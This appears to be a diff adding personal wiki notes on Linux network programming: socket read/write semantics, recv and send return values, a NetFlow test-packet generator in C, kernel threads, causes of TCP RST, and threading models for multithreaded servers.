Creation-Date: 2011-04-21T16:54:08+08:00
|
||||
|
||||
====== Socket summary 1 ======
Created Thursday 21 April 2011
http://blog168.chinaunix.net/space.php?uid=20196318&do=blog&id=165059
Socket programming summary (2011-03-10 20:11)
|
||||
|
||||
1. The read system call
Test program: the client sends the string "hello" to the server over TCP; the server reads it and echoes it back to the client.

Server side, main code:
char buf[4096];
int r = tcp_readn(sock, buf, 4096);
int w = tcp_writen(sock, buf, r);

Client side, main code:
char buf[4096];
int w = tcp_writen(sock, "hello", 5);
int r = tcp_readn(sock, buf, 4096);

Problem: the client's write succeeds, but the server blocks in tcp_readn, which is implemented as follows:

int tcp_readn(int sock, void* buf, int len)
{
    int rd = 0;
    int i = 0;
    while(rd < len) {
        i = read(sock, (char*)buf + rd, len - rd);
        if(i <= 0) {
            return rd;
        }
        rd += i;
    }
    return rd;
}

Cause: tcp_readn returns only after it has read len bytes from the socket (or hit end of file or an error); until then it keeps blocking. While debugging I saw that the read inside tcp_readn ran once, returned 5 bytes, and then blocked, because the function wants 4096 bytes before it returns. Replacing tcp_readn/tcp_writen with plain read/write in both the client and the server solved the problem.

Note: read takes data from the socket. If data is already waiting in the socket buffer, read copies it out and returns. The amount returned may be smaller than the amount requested; this is not an error, it only means the kernel's socket buffer held less data than was asked for. How much data must be readable, or how much space must be writable, before the socket is reported ready is controlled by the receive and send low-water marks, SO_RCVLOWAT (default 1) and SO_SNDLOWAT (default 2048): select returns only when the readable data is at least SO_RCVLOWAT or the writable space is at least SO_SNDLOWAT.
|
||||
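A read-n helper is still useful when the caller knows exactly how many bytes are coming. A minimal sketch of such a loop follows; it differs from tcp_readn above in that it retries on EINTR and reports errors separately from a short count. The name read_full is an assumption.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Read exactly len bytes unless end of file or an error intervenes.
 * Returns the number of bytes read (short only at end of file),
 * or -1 on error. Blocks like tcp_readn if fewer bytes ever arrive. */
ssize_t read_full(int fd, void *buf, size_t len)
{
    size_t got = 0;
    while (got < len) {
        ssize_t n = read(fd, (char *)buf + got, len - got);
        if (n > 0)
            got += (size_t)n;
        else if (n == 0)
            break;                /* peer closed: return what we have */
        else if (errno != EINTR)
            return -1;            /* real error */
        /* EINTR: interrupted by a signal, just try again */
    }
    return (ssize_t)got;
}
```

In the echo test above the server would call read_full(sock, buf, 5), not 4096, because the client sends exactly five bytes.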
|
||||
|
||||
|
||||
|
||||
|
||||
2. How read and write calls correspond

Test program: the client calls write twice, the server calls read once.

Server side, main code:
char buf[4096];
int r = read(sock, buf, sizeof(buf) - 1); /* leave room for the terminator */
if (r >= 0) buf[r] = '\0';
printf("%s\n", buf);

Client side, main code:
write(sock, "hello", 5);
write(sock, " world", 6);

Problem: the server sometimes prints hello (one read matches one write) and sometimes prints hello world (one read matches two writes).

Cause: there is no fixed correspondence between read and write calls on the two ends. read and write only move data out of and into the socket buffers; when the data actually travels from the local buffer to the remote buffer is decided by the kernel according to the TCP machinery. If the data of both writes has reached the server's socket buffer before the server calls read, read returns hello world; if only the data of the first write has arrived, read returns hello.

Normally the server reads hello. If a sleep(1) is added before the server's read, read returns hello world, because within one second the data of both writes has reached the server's buffer.
|
||||
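Because TCP delivers a byte stream with no message boundaries, the usual remedy is for the application to frame its own messages. A minimal sketch, assuming a 4-byte big-endian length prefix and blocking sockets; the names send_msg and recv_msg are made up for the illustration.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Send one message as a 4-byte big-endian length followed by the payload.
 * Returns 0 on success, -1 on error. Assumes a blocking socket, where
 * send normally does not return early for such small buffers. */
int send_msg(int fd, const void *data, uint32_t len)
{
    uint32_t be = htonl(len);
    if (send(fd, &be, sizeof(be), 0) != (ssize_t)sizeof(be))
        return -1;
    if (len > 0 && send(fd, data, len, 0) != (ssize_t)len)
        return -1;
    return 0;
}

/* Receive one message into buf (capacity cap bytes). MSG_WAITALL asks
 * recv to block until the full count has arrived. Returns the payload
 * length, or -1 on end of file, error, or an oversized message. */
int recv_msg(int fd, void *buf, uint32_t cap)
{
    uint32_t be;
    if (recv(fd, &be, sizeof(be), MSG_WAITALL) != (ssize_t)sizeof(be))
        return -1;
    uint32_t len = ntohl(be);
    if (len > cap)
        return -1;
    if (len > 0 && recv(fd, buf, len, MSG_WAITALL) != (ssize_t)len)
        return -1;
    return (int)len;
}
```

With this framing the client's two writes become two send_msg calls, and the server gets "hello" and " world" back as two separate messages no matter how the bytes were grouped on the wire.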
|
||||
|
||||
|
||||
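3. Value-result arguments

Problem: accept, recvfrom, getpeername and getsockname do not return the peer's socket address correctly.

Main code:
struct sockaddr_in sa;
int sock_len = 0;
recvfrom(sock, buf, len, 0, (struct sockaddr*)&sa, &sock_len);

Cause: socket functions take a pointer to a socket address structure together with the length of that structure. How the length is passed depends on the direction in which the structure travels: from the process to the kernel, or from the kernel to the process.

1. From the process to the kernel (bind, connect, sendto, ...): the arguments are a pointer to the address structure and the length of the address as an integer.
2. From the kernel to the process (accept, recvfrom, getsockname, getpeername): the arguments are a pointer to the address structure and a pointer to an integer holding the size of the structure.

In the second case the length is a value-result argument. When the function is called, the size is a value that tells the kernel how large the structure is, so that the kernel does not write past its end. When the function returns, the size is a result that tells the process how much information the kernel actually stored in the structure. In the code above sock_len is initialized to 0, so the kernel writes nothing into the address structure and the contents of sa are indeterminate. Initializing sock_len to sizeof(sa), and declaring it as socklen_t, fixes the problem.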
|
||||
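The corrected call can be wrapped so that the length is always initialized. A minimal sketch; the wrapper name recv_with_sender is an assumption.

```c
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Receive one datagram and report who sent it.
 * On entry *from_len is set to the size of the buffer (the "value");
 * on return the kernel has replaced it with the number of address bytes
 * it actually stored (the "result"). */
ssize_t recv_with_sender(int sock, void *buf, size_t cap,
                         struct sockaddr_in *from, socklen_t *from_len)
{
    memset(from, 0, sizeof(*from));
    *from_len = sizeof(*from);
    return recvfrom(sock, buf, cap, 0, (struct sockaddr *)from, from_len);
}
```

After a successful call, from->sin_addr and from->sin_port identify the sender and *from_len equals sizeof(struct sockaddr_in) for an IPv4 socket.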
|
||||
|
||||
|
||||
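4. getsockname and getpeername

What getsockname and getpeername return depends heavily on when they are called:

1. TCP server: getsockname can be called right after bind to obtain the local address and port. getpeername may only be called once a connection has been established (after accept); before that it cannot return the peer's address and port.
2. TCP client: when socket is called the kernel has not yet assigned an IP address or port, so getsockname does not return a meaningful address at that point (and since no connection exists, getpeername is out of the question). After bind, getsockname returns the bound address. To obtain the peer's address (a client rarely needs this), the connection must be established first. Once it is, the client's own address and port have also been assigned, so that is the moment to call getsockname.
3. Connected UDP socket (after connect): both functions can be used (getpeername is again of little use: if you did not know the peer's address and port you could not have called connect).
4. Unconnected UDP socket: getpeername cannot be called, but getsockname can. As with TCP, the address and port are not assigned when socket is called, but after the first call to sendto.

5. send/recv and sendto/recvfrom

With TCP, a return value of 0 from recv means the peer has closed the connection. UDP is connectionless: a return value of 0 from recvfrom means the peer sent a datagram of length 0 (a 20-byte IP header plus an 8-byte UDP header).

6. TCP and UDP server models

1. TCP servers are typically concurrent, UDP servers typically iterative.
2. A TCP server accepts client requests on its listening socket. When a request arrives it creates a new connection for it and may start a separate process (or thread) to serve that client, while the listening socket goes on waiting for new requests. Each connection has its own receive buffer; that is, the connections are independent of one another as far as the TCP server is concerned.
3. A UDP server has a single server process. Its one socket receives all arriving datagrams and sends all responses, and that socket has one receive buffer that holds the arriving datagrams. Datagrams sent to the server enter the receive buffer in order; each call to recvfrom hands the next datagram in the buffer to the process.

7. connect on a UDP socket

connect can also be called on a UDP socket, but unlike TCP there is no three-way handshake. The kernel only checks for errors it can detect immediately (such as an unreachable destination), records the peer's IP address and port number, and returns to the calling process right away.

Compared with the default unconnected UDP socket, a connected UDP socket behaves as follows:

1. The destination IP address and port can no longer be specified for output, so sendto with a destination is replaced by write or send. Anything written to a connected UDP socket is sent to the protocol address given to connect.
2. recvfrom is not needed to learn the sender; recv or read is used instead. The only datagrams the kernel returns on a connected UDP socket are those arriving from the protocol address given to connect. A connected UDP socket can therefore exchange data with exactly one peer.
3. Asynchronous errors caused by a connected UDP socket are returned to the owning process (an unconnected UDP socket does not receive them).

Before an unconnected UDP socket sends a datagram, the kernel temporarily connects the socket, sends the data, and disconnects it again. Sending several datagrams therefore goes:

[connect socket] ==> [output datagram 1] ==> [disconnect socket] ==>
[connect socket] ==> [output datagram 2] ==> [disconnect socket] ...
[connect socket] ==> [output datagram n] ==> [disconnect socket]

When an application sends many datagrams to the same destination, connecting the socket explicitly is more efficient, because the address is not copied into the kernel for every datagram:

[connect socket] ==> [output datagram 1] ==> [output datagram 2] ...
[output datagram n] ==> [disconnect socket]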
|
||||
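The connected-UDP behaviour described in section 7 can be tried with a few lines. A minimal sketch, assuming IPv4; the helper name udp_connect is made up.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/* Create a UDP socket and connect it to peer. No packets are exchanged:
 * the kernel only records the peer address and picks a local address.
 * Returns the descriptor, or -1 on error. */
int udp_connect(const struct sockaddr_in *peer)
{
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0)
        return -1;
    if (connect(fd, (const struct sockaddr *)peer, sizeof(*peer)) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```

On the returned descriptor, send and recv (or write and read) work without an address argument, and both getsockname and getpeername succeed.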
20
Zim/Programme/APUE/zhuse.txt
Normal file
@@ -0,0 +1,20 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-02T22:16:04+08:00
|
||||
|
||||
====== zhuse ======
|
||||
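Created Thursday 02 June 2011

1. What do the return values of recv mean in blocking and in non-blocking mode, and is there any difference? (As far as I understand, there is none: < 0 means error, = 0 means the connection was closed, > 0 is the number of bytes received. In particular, when the return value is < 0 and (errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN), the connection is considered healthy and receiving continues. The only difference is that in blocking mode recv blocks while waiting for data, whereas in non-blocking mode it returns when there is no data instead of blocking, so the read has to be repeated in a loop.)

2. What do the return values of write mean in blocking and in non-blocking mode, and is there any difference? (As far as I understand, there is none: < 0 means error, = 0 means the connection was closed, > 0 is the number of bytes sent. In particular, when the return value is < 0 and (errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN), the connection is considered healthy and sending continues. The only difference is that in blocking mode write blocks while sending, whereas in non-blocking mode it returns when the data cannot be sent for the moment instead of blocking, so the send has to be repeated in a loop.)

3. In blocking mode, when read returns < 0 && errno != EINTR && errno != EWOULDBLOCK && errno != EAGAIN, the connection is broken and must be closed; when read returns < 0 && (errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN), there is no data and receiving must continue; a return value greater than 0 means data was received.
In non-blocking mode, read returning < 0 means there is no data, = 0 means the connection was closed, > 0 means data was received.
Is this the right way to read the return values in the two modes? Is there a more detailed or more accurate explanation?

4. In both blocking and non-blocking mode, does send returning < 0 && (errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN) mean the send failed temporarily and must be retried, does send returning <= 0 && errno != EINTR && errno != EWOULDBLOCK && errno != EAGAIN mean the connection is broken and must be closed, and does send returning > 0 mean data was sent? Is that the right way to read send's return value? Does send returning 0 mean failure in both modes, or does it mean in one of them that sending is temporarily impossible and must be retried?

5. Many people say that read blocks in blocking mode. Is that so? A colleague and I tried it, and read did not block.

6. I found a lot of material online, but all of it is vague: it only distinguishes greater than 0, less than 0 and equal to 0, without separating blocking from non-blocking mode, let alone the individual error codes. I hope an expert can answer the questions above one by one, the more detail the better. I am rarely on CSDN and have few points to offer, sorry.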
|
||||
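One way to organize the cases raised in these questions is a small classification function. The sketch below reflects the usual POSIX reading for a stream socket and is offered as an aid, not as an authoritative answer to the post; the enum and the name classify_recv are assumptions. The mapping is the same in blocking and non-blocking mode; what differs is which cases occur in practice (EAGAIN/EWOULDBLOCK normally appears only on a non-blocking socket or one with a receive timeout).

```c
#include <errno.h>
#include <sys/types.h>

enum io_status {
    IO_DATA,     /* n > 0: that many bytes were transferred          */
    IO_CLOSED,   /* recv returned 0: the peer closed the connection  */
    IO_RETRY,    /* nothing transferred now, the connection is fine  */
    IO_ERROR     /* a real error: close the connection               */
};

/* Classify the result of recv on a stream socket. n is the return value,
 * err is errno captured immediately after the call. Assumes the request
 * length was nonzero (a zero-length request also returns 0). */
enum io_status classify_recv(ssize_t n, int err)
{
    if (n > 0)
        return IO_DATA;
    if (n == 0)
        return IO_CLOSED;
    if (err == EINTR || err == EAGAIN || err == EWOULDBLOCK)
        return IO_RETRY;
    return IO_ERROR;
}
```

For send or write the first, third and fourth cases apply in the same way. A return value of 0 from send does not signal a closed connection; a closed or reset peer shows up as an error such as EPIPE or ECONNRESET.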
191
Zim/Programme/APUE/一个简单的生成包和发包的程序.txt
Normal file
@@ -0,0 +1,191 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T17:21:39+08:00
|
||||
|
||||
====== A simple program that builds and sends a packet ======
Created Saturday 04 June 2011
http://hi.baidu.com/soulingm/blog/item/cad303f41998b02c730eeca8.html

Steps:

1. Build the packet

Define the structures
Define a structure variable
Fill in the structure variable
#define FLOWCOUNT 30

struct netflow_header /* packet header */
{
    unsigned short version;
    unsigned short count;
    unsigned int sysUptime;
    unsigned int unix_seconds;
    unsigned int unix_nanoseconds;
    unsigned int flow_sequence_number;
    unsigned char engine_type;
    unsigned char engine_ID;
    unsigned short reserved;
};
struct netflow_Entry /* payload record */
{
    unsigned int src_Ip;
    unsigned int dst_Ip;
    unsigned int next_hop_Ip;
    unsigned short input_interface_index;
    unsigned short output_interface_index;
    unsigned int packets;
    unsigned int bytes;
    unsigned int start_time;
    unsigned int end_time;
    unsigned short src_Port;
    unsigned short dst_Port;
    unsigned char pad;
    unsigned char flag;
    unsigned char proto;
    unsigned char tos;
    unsigned short src_AS;
    unsigned short dst_AS;
    unsigned char src_netmask_len;
    unsigned char dst_netmask_len;
    unsigned short padding; ** // note this pad field**
};

struct netflow_pkt /* the whole packet */
{
    struct netflow_header hdr; /* header */
    struct netflow_Entry entry[30]; /* payload */
} pkts;
|
||||
|
||||
2. Send the packet

Create the socket,
set up the destination address,
and send the packet built above
unsigned int GetTickCount()
{
    struct tms tm;
    return (unsigned int)times(&tm);
}

unsigned int rand_long()
{
    unsigned int ip_addr,ip1,ip2,ip3,ip4;
    ip1 = rand()%254+1;
    ip2 = rand()%254+1;
    ip3 = rand()%254+1;
    ip4 = rand()%254+1;

    ip_addr = (ip1<<24)+(ip2<<16)+(ip3<<8)+ip4;

    return ip_addr;
}
|
||||
|
||||
|
||||
void create_packet() /* build one packet */
{
    int i = 0;
    unsigned int currentT;
    unsigned int seconds;
    int counts = FLOWCOUNT;

    pkts.hdr.version = __htons__(5); // note these byte-order conversions
    pkts.hdr.count = __htons__(counts);

    currentT = GetTickCount();
    seconds = currentT/1000;
    // 32-bit fields need htonl; htons would truncate them to 16 bits
    pkts.hdr.sysUptime = __htonl__(currentT - 2000);
    pkts.hdr.unix_seconds = htonl(seconds);
    pkts.hdr.unix_nanoseconds = htonl(currentT - seconds * 1000);
    pkts.hdr.engine_ID = (unsigned char)11;
    pkts.hdr.engine_type = (unsigned char)1;
    pkts.hdr.reserved = htons(1);

    for (i =0; i < counts ; i++)
    {
        pkts.entry[i].src_Ip = htonl(rand_long());
        pkts.entry[i].dst_Ip = htonl(rand_long());
        pkts.entry[i].next_hop_Ip = htonl(rand_long());

        pkts.entry[i].input_interface_index = htons(rand()%3+1);
        pkts.entry[i].output_interface_index = htons(rand()%3+1);

        pkts.entry[i].packets = htonl(rand()%1000+5);
        pkts.entry[i].bytes = htonl(rand()%2048 + 48);

        pkts.entry[i].start_time = htonl(currentT - 1500);
        pkts.entry[i].end_time = htonl(currentT - 100);

        pkts.entry[i].src_Port = htons(rand()%65533+1);
        pkts.entry[i].dst_Port = htons(rand()%65533+1);

        // single-byte fields have no byte order and need no conversion
        pkts.entry[i].pad = (unsigned char)1;
        pkts.entry[i].flag = (unsigned char)(rand()%256);

        if(counts%2 == 0)
            pkts.entry[i].proto = (unsigned char)1; //lfc changed
        else
            if(counts%3 == 0)
                pkts.entry[i].proto = (unsigned char)6;
            else
                pkts.entry[i].proto = (unsigned char)17;

        pkts.entry[i].tos = (unsigned char)1;

        pkts.entry[i].src_AS = htons(rand()%100+1);
        pkts.entry[i].dst_AS = htons(rand()%100+1);

        pkts.entry[i].src_netmask_len = (unsigned char)24;
        pkts.entry[i].dst_netmask_len = (unsigned char)24;

        pkts.entry[i].padding = htons(0);
    }
}
|
||||
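The conversion functions must match the field width: htons is for 16-bit fields, htonl for 32-bit fields, and single bytes need nothing. A small sketch of what goes wrong when htons is applied to a 32-bit value; the function names wrong_convert and right_convert are made up for the illustration.

```c
#include <arpa/inet.h>
#include <stdint.h>

/* What lands in a 32-bit field when the 16-bit conversion is used by
 * mistake: the argument is first truncated to its low 16 bits, so the
 * upper half of the value (for an IPv4 address, the first two octets)
 * is lost. */
uint32_t wrong_convert(uint32_t host_value)
{
    return htons((uint16_t)host_value);
}

/* The matching conversion for a 32-bit field. */
uint32_t right_convert(uint32_t host_value)
{
    return htonl(host_value);
}
```

For the address 10.0.0.1 (0x0A000001), right_convert round-trips through ntohl unchanged, while wrong_convert keeps only 0x0001.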
int clifd;

struct sockaddr_in servaddr,cliaddr;

void send_packet(char *server_addr_string,unsigned int server_port) /* send the packet */
{
    int numbytes;
    socklen_t socklen = sizeof(servaddr);

    if ((clifd = socket(AF_INET,SOCK_DGRAM,0)) < 0)
    {
        printf("create socket error!\n");
        exit(1);
    }

    bzero(&cliaddr,sizeof(cliaddr));
    cliaddr.sin_family = AF_INET;
    cliaddr.sin_addr.s_addr = htonl(INADDR_ANY);
    cliaddr.sin_port = htons(0);

    bzero(&servaddr,sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    inet_aton(server_addr_string,&servaddr.sin_addr);
    servaddr.sin_port = htons(server_port);

    if ((numbytes=sendto(clifd, (char *)&pkts,24+48*FLOWCOUNT, 0, (struct sockaddr *)&servaddr, socklen)) == -1) {
        printf("error send !\n");
        printf("Wait Error:%s\n",strerror(errno));
        exit(1);
    }
}
int main() /* main program */
{
    create_packet(); /* build the packet first */
    send_packet(str_dst_ip,dst_port); /* then send it */
}
|
||||
|
||||
61
Zim/Programme/APUE/内核线程.txt
Normal file
@@ -0,0 +1,61 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-21T16:58:26+08:00
|
||||
|
||||
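====== Kernel threads ======
Created Thursday 21 April 2011

Linux kernel threads (2011-02-24 19:21)
Tags: kernel threads linux kernel_thread kthread_run Category: Linux kernel study

Kernel threads are processes started directly by the kernel itself. In effect they delegate a kernel function to a separate process that runs "in parallel" with the other processes in the system (and in fact in parallel with the kernel's own execution). Kernel threads are often called kernel "daemons". They are mainly used for the following tasks:

* Periodically synchronizing modified memory pages with the block device the pages came from.
* Writing memory pages to the swap area if they are rarely used.
* Managing deferred actions.
* Implementing the transaction journal of file systems.

There are two main kinds of kernel thread:

1. The thread is started and then waits until the kernel asks it to perform a specific action.
2. The thread is started and then runs at periodic intervals, checks the usage of a specific resource, and acts when the usage rises above or falls below a preset limit.

Kernel threads are created by the kernel itself and have these characteristics:

1. They run in the supervisor mode of the CPU, not in user mode.
2. They can access only the kernel part of the virtual address space (all addresses above TASK_SIZE), not user space.

The task_struct process descriptor contains two fields related to the process address space, mm and active_mm. For an ordinary user process, mm points to the user-space part of the virtual address space; for a kernel thread, mm is NULL.

active_mm exists mainly as an optimization. Because a kernel thread is not associated with any particular user process, the kernel does not need to switch the user-space part of the virtual address space and can simply keep the old setting. Since any user process may have been running before the kernel thread, the contents of the user-space part are essentially random and the kernel thread must never modify them, which is why mm is set to NULL. If the task being switched out is a user process, the kernel stores that process's mm in the active_mm of the incoming kernel thread. If the process that runs after the kernel thread is the same one that ran before it, the kernel does not need to touch the user-space address tables and the information in the TLB is still valid. Only when the process that runs after the kernel thread differs from the earlier user process is a switch needed, and the corresponding TLB entries are flushed.

A kernel thread can be implemented in two ways:

1. Pass a function to kernel_thread. That function is then responsible for helping the kernel turn it into a daemon by calling daemonize, which does the following:
* It releases all resources of the parent process, which would otherwise stay pinned until the thread ends.
* It blocks the receipt of signals.
* It makes init the parent of the daemon.
2. A more common way to create a kernel thread is the helper function kthread_create, which creates a new kernel thread. The thread is initially stopped and must be started with wake_up_process. Alternatively use kthread_run, which, unlike kthread_create, wakes the new thread immediately after creating it.

The kernel threads running in the system can be listed with the ps fax command.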
|
||||
25
Zim/Programme/APUE/发生TCP_RET的原因.txt
Normal file
@@ -0,0 +1,25 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-07-04T20:13:15+08:00
|
||||
|
||||
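====== Causes of TCP RST ======
Created Monday 04 July 2011
A TCP RST can have many causes, for example:
1. The client connects to a port on which no process is listening: connection setup fails, and the peer's TCP stack sends the client an RST whose Seq is not fixed (it depends on the initial value used by the server's TCP).
2. A process is listening on the port the client connects to: the TCP connection is established successfully, but if the server process fails to authenticate the client process it may also send an RST to abort the connection (as with ssh, rlogin, ftp).
Note: in case 1 the RST is sent by the TCP stack. In case 2 the server's TCP stack has already established a connection with the client's TCP stack, and the RST is sent by the server process when authentication of the client fails.
3. Connection and authentication are fine and the two sides can communicate normally, but the server has set the TCP socket option SO_LINGER (with a zero linger time). In that case the normal termination sequence (FIN/ACK/FIN/ACK) at the end of the transfer is replaced by an RST.
4. Connection, authentication and socket options are all normal. After communication ends, the side that actively closes the TCP connection stays in TIME_WAIT for 2MSL (maximum segment lifetime), about 120 seconds (30 seconds on BSD). During this period the 4-tuple already used (source IP, source port, destination IP, destination port) cannot be used again; otherwise the TCP stack sends an RST to the process that reuses the tuple.
5. Independently of client and server, intermediate network devices such as routers, firewalls and packet filters enforce security policies such as traffic (bandwidth) management, access restrictions and transparent proxying. When they receive a packet that violates the policy, they too send an RST to the source.

Now let us analyze the result in the figure above:
In normal web browsing, cases 1, 2 and 3 do not occur, because the client browser generally uses ephemeral ports, and the server process and port are generally open and need no authentication.
So I think the most likely cause of so many RSTs is still cases 4 and 5.

How would that happen? My guesses:
1. The telecom carrier and the education network assign the school only a limited number of public IP addresses, so a large number of campus users reach the outside through NAT addresses. To servers outside the campus many source IP addresses therefore look identical and differ only in the source port. A poorly configured server under heavy load will then RST large numbers of concurrent connections from the same IP.
2. Because outbound bandwidth is always limited, the carrier or the school's network administrators certainly restrict bandwidth in various parts of the network. When traffic exceeds the limit, the network devices send RSTs to the source.
3. For sites with sensitive content, the authorities obstruct DNS resolution requests and access to the destination IP, and send RSTs to the source through devices like the GFW to prevent connections from being established.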
|
||||
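Cause 3 in the list above can be reproduced deliberately. A minimal sketch of the socket option setting that makes close send an RST instead of the FIN handshake; the helper name set_abortive_close is an assumption.

```c
#include <sys/socket.h>

/* Enable SO_LINGER with a zero timeout. On a connected TCP socket a
 * later close() then discards unsent data and aborts the connection
 * with an RST, and the socket skips TIME_WAIT. Returns 0 on success,
 * -1 on error. */
int set_abortive_close(int sock)
{
    struct linger lg;
    lg.l_onoff = 1;    /* lingering enabled ...          */
    lg.l_linger = 0;   /* ... with a timeout of 0 seconds */
    return setsockopt(sock, SOL_SOCKET, SO_LINGER, &lg, sizeof(lg));
}
```

This is occasionally used on purpose, for example to avoid piling up TIME_WAIT sockets in tests, but data still queued for sending is lost, so it is not a substitute for an orderly shutdown.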
|
||||
590
Zim/Programme/APUE/多线程服务器的常用编程模型.txt
Normal file
@@ -0,0 +1,590 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-17T10:33:40+08:00
|
||||
|
||||
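====== Common programming models for multithreaded servers ======
Created Friday 17 February 2012

http://blog.163.com/chenlvhong_1989/blog/static/150280282201023102327978/?fromdm&fromSearch&isFromSearchEngine=yes

This article covers some of my modest experience with multithreaded development. It summarizes one or two commonly used **threading models** and sums up __best practices for interprocess communication and thread synchronization__, with the aim of writing multithreaded programs in a simple, disciplined way.

The "multithreaded server" in this article is a **dedicated network application** running on Linux. The hardware is multi-core Intel x64 CPUs in single- or dual-socket SMP servers (four or eight cores and a dozen or so GB of memory per machine), connected by 100 Mb or gigabit Ethernet. This is roughly the mainstream configuration of commodity PC servers today.

This article does not cover Windows or user interfaces (command-line or graphical). It ignores file I/O (apart from writing logs to disk), database operations and Web applications. It ignores low-end single-core hosts, embedded systems, handheld devices, dedicated network equipment, and high-end Unix hosts with >=32 cores. It considers only TCP, not UDP, and no way of moving data other than the local network (serial and parallel ports, USB, data acquisition cards, real-time control and so on).

With all these restrictions, **the basic job of the "network application" I am going to discuss can be summed up as "receive data, compute, send it back out"**. In this simplified model there seems to be no need for multiple threads; a single thread should do well enough. The question "why write multithreaded programs at all" easily starts a flame war, so I discuss it in a separate post. Please allow me to take "multithreaded programming" as given here.

The word "server" sometimes means a program, sometimes a process, and sometimes hardware (virtual or real); please tell them apart from context. This article also ignores virtualization: when I say "two processes are not on the same machine", I mean that logically they do not run in the same operating system, even though physically they may sit in two "virtual machines" hosted by one machine.

This article assumes the reader already has knowledge of and experience with multithreaded programming. It is not an introductory tutorial.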
|
||||
|
||||
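===== 1 Processes and threads =====

The __process__ is one of the two most important concepts in an operating system (the other is the __file__). Roughly speaking, a process is "a program running in memory". In this article a process is the thing Linux produces through the fork() system call, or the product of CreateProcess() on Windows, not the lightweight process of Erlang.

Every process has its own independent __address space__. "In the same process" versus "not in the same process" is an important decision point when dividing up a system's functions. The Erlang book compares a "process" to a "person", which I find very apt and which gives us a framework for thinking.

Every person has his own memory. People communicate by talking (message passing), either face to face (same server) or over the phone (different servers, with network communication). The difference is that face to face you know immediately whether the other person has died (crash, SIGCHLD), whereas on the phone you can only judge whether the other side is still alive through a **periodic heartbeat**.

With these metaphors, a distributed system can be designed by __role play__: several people in the team each play a process, and a person's role is determined by the process's code (one handles logins, one dispatches messages, one handles trading, and so on). Each person has his own memory but does not know anyone else's; to learn someone else's view he has to talk to them. (Shared memory as an __IPC__ mechanism is left aside for now.) One can then think through fault tolerance (what if someone suddenly dies), scaling out (a newcomer joins midway), load balancing (moving a's work to b), retirement (a needs a bug fix: stop giving him new work, and restart him once he has finished what he has in hand) and other scenarios with great ease.

The __"thread"__ only gradually became popular after about 1993, little more than ten years ago, which does not compare with the 40 glorious years of Unix. The arrival of threads caused Unix a good deal of trouble: many C library functions (strtok(), ctime()) are __not thread-safe__ and had to be redefined, and the semantics of signals became far more complicated. As far as I know, the first (commodity) operating systems to support multithreaded programming were Solaris 2.2 and Windows NT 3.1, both released in 1993. The POSIX threads standard followed in 1995.

The defining feature of threads is that they share an address space and can therefore share data efficiently. Multiple processes on one machine can share code segments efficiently (the operating system can map them to the same physical memory) but cannot share data. If several processes share large amounts of memory, that amounts to writing a multithreaded program disguised as a multi-process one, which is self-deception.

The value of multithreading, in my view, is to __make better use of symmetric multiprocessing (SMP)__. Before SMP, multithreading had little value. Alan Cox said: A computer is a state machine. Threads are for people who can't program state machines. If there is only one execution unit, one CPU, then as Alan Cox says, writing the program as a state machine is the most efficient way, and that is exactly the programming model shown in the next section.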
|
||||
|
||||
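===== 2 The typical single-threaded server programming model =====

UNP3e summarizes this well (chapter 6: I/O models; chapter 30: client/server design alternatives), so I will not repeat it. As far as I know, the model most widely used in high-performance network programs is probably __"non-blocking IO + IO multiplexing"__, that is, the __Reactor pattern__. The examples I know of are:

* **lighttpd**, a single-threaded server. (nginx is probably similar, to be checked)
* **libevent/libev**
* ACE, Poco C++ libraries (QT to be checked)
* Java NIO (Selector/SelectableChannel), Apache Mina, Netty (Java)
* POE (Perl)
* **Twisted** (Python)

By contrast, **boost::asio** and Windows I/O Completion Ports implement the __Proactor pattern__, which seems to be less widely applicable. ACE implements the Proactor pattern as well, but I will not go into that.

In the "non-blocking IO + IO multiplexing" model, __the basic structure of the program is an event loop__ (the code is only a sketch and does not cover every case):

while (!done)
{
    int timeout_ms = min(1000, getNextTimedCallback());
    int retval = ::poll(fds, nfds, timeout_ms);
    if (retval < 0) {
        handle the error
    } else {
        handle expired timers
        if (retval > 0) {
            handle IO events
        }
    }
}

Of course select(2)/poll(2) have many shortcomings. __On Linux they can be replaced by epoll__, and other operating systems have their own high-performance replacements (search for "c10k problem").

The advantages of the Reactor model are obvious: programming is simple and efficiency is good. Not only network reads and writes but also connection setup (connect/accept) and even DNS resolution can be done in a non-blocking way to **raise concurrency and throughput**. It is a good choice for IO-bound applications. Lighttpd works this way, and its internal fdevent structure is very elegant and worth studying. (The suboptimal approach of blocking IO is not considered here.)

Of course, implementing a high-quality Reactor is not that easy, and I have not used the open-source libraries that are around, so I will not recommend any here.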
|
||||
|
||||
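===== 3 Typical threading models for multithreaded servers =====

I could find little literature on this. There are roughly these approaches:

1. One thread per request, using __blocking IO__. Before Java 1.4 introduced NIO, this was the recommended practice for Java network programming. Unfortunately it does not scale well.
2. A __thread pool__, also with blocking IO. Compared with 1, this is a performance measure.
3. Non-blocking IO + IO multiplexing, that is, the Java NIO way.
4. Advanced patterns such as Leader/Follower.

By default I use the third, that is, non-blocking IO + one loop per thread.

1) **One loop per thread**

In this model, __every IO thread in the program has one event loop (also called a Reactor) that handles reads, writes and timer events__ (periodic or one-shot). The code skeleton is the same as in section 2.
The benefits of this approach are:

* The number of threads is essentially fixed and can be set at program start; threads are not created and destroyed frequently.
* Load can easily be __distributed among the threads__.

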